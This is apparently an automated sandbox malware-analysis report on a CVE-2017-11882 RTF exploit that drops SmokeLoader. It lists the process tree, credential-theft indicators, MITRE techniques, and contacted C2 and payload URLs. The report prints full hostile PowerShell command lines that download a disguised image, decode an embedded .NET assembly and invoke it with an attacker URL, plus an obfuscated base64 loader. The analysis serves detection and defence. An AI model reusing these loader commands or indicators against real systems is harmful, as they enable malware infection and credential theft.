            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.vfew/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?eJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.vfew/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"Jump to behavior
            Source: explorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman-
            Source: explorer.exe, 0000000C.00000002.629305688.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.374758061.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 0000000C.00000002.629305688.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.374758061.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000C.00000002.629305688.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.374758061.0000000000720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_001155EB cpuid 19_2_001155EB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaQueries volume information: C:\Users\user\AppData\Roaming\gwseuha VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C2112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,19_2_000C2112
            Source: C:\Windows\explorer.exeCode function: 12_2_02803490 GetUserNameW,12_2_02803490
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C2198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,19_2_000C2198
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected SmokeLoader
            Source: Yara matchFile source: 00000019.00000002.628348956.0000000000061000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2840, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2836, type: MEMORYSTR
            Source: Yara matchFile source: 7.2.powershell.exe.2878da8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB

            Remote Access Functionality

            barindex
            Yara detected SmokeLoader
            Source: Yara matchFile source: 00000019.00000002.628348956.0000000000061000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2840, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2836, type: MEMORYSTR
            Source: Yara matchFile source: 7.2.powershell.exe.2878da8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information111
            Scripting            		Valid Accounts11
            Native API            		111
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts53
            Exploitation for Client Execution            		1
            DLL Side-Loading            		623
            Process Injection            		1
            Deobfuscate/Decode Files or Information            		11
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol11
            Data from Local System            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts111
            Command and Scripting Interpreter            		Logon Script (Windows)Logon Script (Windows)2
            Obfuscated Files or Information            		1
            Credentials in Registry            		13
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts3
            PowerShell            		Login HookLogin Hook1
            Install Root Certificate            		NTDS127
            System Information Discovery            		Distributed Component Object Model11
            Input Capture            		115
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets431
            Security Software Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            File Deletion            		Cached Domain Credentials141
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Masquerading            		DCSync13
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Modify Registry            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
            Virtualization/Sandbox Evasion            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron623
            Process Injection            		Network Sniffing1
            Remote System Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            Hidden Files and Directories            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1502248 Sample: SecuriteInfo.com.Exploit.CV... Startdate: 31/08/2024 Architecture: WINDOWS Score: 100 85 Multi AV Scanner detection for domain / URL 2->85 87 Suricata IDS alerts for network traffic 2->87 89 Found malware configuration 2->89 91 18 other signatures 2->91 12 WINWORD.EXE 291 13 2->12         started        14 taskeng.exe 1 2->14         started        process3 process4 16 EQNEDT32.EXE 12 12->16         started        21 EQNEDT32.EXE 12->21         started        23 gwseuha 14->23         started        dnsIp5 61 23.94.148.16, 49163, 49165, 80 AS-COLOCROSSINGUS United States 16->61 57 C:\...\verynicebuttersmoothcakeicream.vBs, Unicode 16->57 dropped 93 Office equation editor establishes network connection 16->93 95 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 16->95 25 wscript.exe 1 16->25         started        file6 signatures7 process8 signatures9 107 Suspicious powershell command line found 25->107 109 Wscript starts Powershell (via cmd or directly) 25->109 111 Very long command line found 25->111 113 3 other signatures 25->113 28 powershell.exe 4 25->28         started        process10 signatures11 115 Suspicious powershell command line found 28->115 117 Suspicious execution chain found 28->117 31 powershell.exe 12 5 28->31         started        process12 dnsIp13 67 ia803104.us.archive.org 207.241.232.154, 443, 49164 INTERNET-ARCHIVEUS United States 31->67 71 Installs new ROOT certificates 31->71 73 Writes to foreign memory regions 31->73 75 Injects a PE file into a foreign processes 31->75 35 RegAsm.exe 31->35         started        38 RegAsm.exe 31->38         started        40 RegAsm.exe 31->40         started        signatures14 process15 signatures16 97 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 35->97 99 Maps a DLL or memory area into another process 35->99 101 Checks if the current machine is a virtual machine (disk enumeration) 35->101 103 Creates a thread in another existing process (thread injection) 35->103 42 explorer.exe 2 35->42 injected 105 Switches to a custom stack to bypass stack traces 38->105 process17 dnsIp18 63 prolinice.ga 42->63 65 prolinice.ga 185.251.91.119, 49166, 49167, 49168 SPRINTHOSTRU Russian Federation 42->65 59 C:\Users\user\AppData\Roaming\gwseuha, PE32 42->59 dropped 119 System process connects to network (likely due to code injection or exploit) 42->119 121 Benign windows process drops PE files 42->121 123 Injects code into the Windows Explorer (explorer.exe) 42->123 125 2 other signatures 42->125 47 explorer.exe 6 42->47         started        51 explorer.exe 42->51         started        53 explorer.exe 42->53         started        55 6 other processes 42->55 file19 signatures20 process21 dnsIp22 69 prolinice.ga 47->69 77 System process connects to network (likely due to code injection or exploit) 47->77 79 Found evasive API chain (may stop execution after checking mutex) 47->79 81 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 47->81 83 4 other signatures 47->83 signatures23

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf50%VirustotalBrowse
            SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf50%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
            SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf100%AviraHEUR/Rtf.Malformed

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\gwseuha0%ReversingLabs
            C:\Users\user\AppData\Roaming\gwseuha0%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            ia803104.us.archive.org1%VirustotalBrowse
            prolinice.ga16%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            http://crl.entrust.net/server1.crl00%URL Reputationsafe
            http://crl.entrust.net/server1.crl00%URL Reputationsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg100%URL Reputationmalware
            http://go.microsoft.c0%URL Reputationsafe
            https://support.mozilla.org0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://secure.comodo.com/CPS00%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
            http://prolinice.ga/ndex.php0%Avira URL Cloudsafe
            http://www.piriform.com/ccleanerxe0%Avira URL Cloudsafe
            Http://prolinice.ga/index.phpBB740%Avira URL Cloudsafe
            http://prolinice.ga/0%Avira URL Cloudsafe
            https://ia803104.us.archive.org0%Avira URL Cloudsafe
            http://wehtwifahcxeheu.com/0%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
            https://ia803104.us.archive.org1%VirustotalBrowse
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFj0%Avira URL Cloudsafe
            https://www.google.com/favicon.ico0%Avira URL Cloudsafe
            http://java.sun.com0%Avira URL Cloudsafe
            https://www.google.com/favicon.ico0%VirustotalBrowse
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIF100%Avira URL Cloudmalware
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFj1%VirustotalBrowse
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv0%Avira URL Cloudsafe
            http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
            http://prolinice.ga/16%VirustotalBrowse
            http://prolinice.ga/ndex.php1%VirustotalBrowse
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIF1%VirustotalBrowse
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv0%VirustotalBrowse
            http://java.sun.com0%VirustotalBrowse
            http://23.94.148.160%Avira URL Cloudsafe
            http://www.piriform.com/ccleaner0%Avira URL Cloudsafe
            http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.01%VirustotalBrowse
            http://23.94.148.16/90/WEFV.txt0%Avira URL Cloudsafe
            http://www.autoitscript.com/autoit30%Avira URL Cloudsafe
            http://23.94.148.162%VirustotalBrowse
            http://prolinice.ga/index.php100%Avira URL Cloudmalware
            http://vilendar.ga/index.php100%Avira URL Cloudmalware
            http://prolinice.ga/index.phpMozilla/5.00%Avira URL Cloudsafe
            http://www.piriform.com/ccleaner0%VirustotalBrowse
            http://wehtwifahcxeheu.com/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
            http://prolinice.ga/index.php19%VirustotalBrowse
            https://ia803104.us.archive.org/27/items/vbs_20240LR0%Avira URL Cloudsafe
            http://23.94.148.16/90/WEFV.txt1%VirustotalBrowse
            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
            http://www.autoitscript.com/autoit30%VirustotalBrowse
            http://prolinice.ga/index.phpMozilla/5.01%VirustotalBrowse
            http://vilendar.ga/index.php17%VirustotalBrowse
            https://ia803104.us.archive.org/27/items/vbs_20240LR1%VirustotalBrowse
            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ia803104.us.archive.org
            		207.241.232.154
            		truetrueunknown
            prolinice.ga
            		185.251.91.119
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFtrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpgtrue
            • URL Reputation: malware
            		unknown
            http://23.94.148.16/90/WEFV.txttrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://prolinice.ga/index.phptrue
            • 19%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://vilendar.ga/index.phptrue
            • 17%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.piriform.com/ccleanerxeexplorer.exe, 0000000C.00000002.629766627.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374893412.000000000260E000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://duckduckgo.com/chrome_newtabexplorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.drfalse
            • URL Reputation: safe
            		unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://prolinice.ga/ndex.phpexplorer.exe, 00000013.00000002.432154791.00000000003D6000.00000004.00000020.00020000.00000000.sdmptrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://duckduckgo.com/ac/?q=explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.drfalse
            • URL Reputation: safe
            		unknown
            Http://prolinice.ga/index.phpBB74explorer.exe, 0000000C.00000002.630809600.00000000078EA000.00000004.00000001.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            		unknown
            http://crl.entrust.net/server1.crl0powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://ia803104.us.archive.orgpowershell.exe, 00000007.00000002.363808831.0000000002629000.00000004.00000800.00020000.00000000.sdmptrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://ocsp.entrust.net03powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
